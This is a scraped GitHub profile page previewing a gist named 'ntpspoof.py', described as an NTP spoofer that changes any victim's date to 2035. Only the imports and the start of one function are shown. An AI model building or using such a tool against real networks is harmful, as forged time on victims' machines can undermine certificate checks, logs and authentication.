Skip to content

Instantly share code, notes, and snippets.

View iteufel's full-sized avatar
🚀

Allan Amstadt iteufel

🚀
View GitHub Profile
@Dbof
Dbof / ntpspoof.py
Last active May 26, 2025 02:57
NTP spoofer to change the date of any victim to the year 2035
import os
import sys
import time
from subprocess import Popen, DEVNULL
import datetime
from scapy.all import IP, UDP, NTP
from netfilterqueue import NetfilterQueue
def get_switch_ip():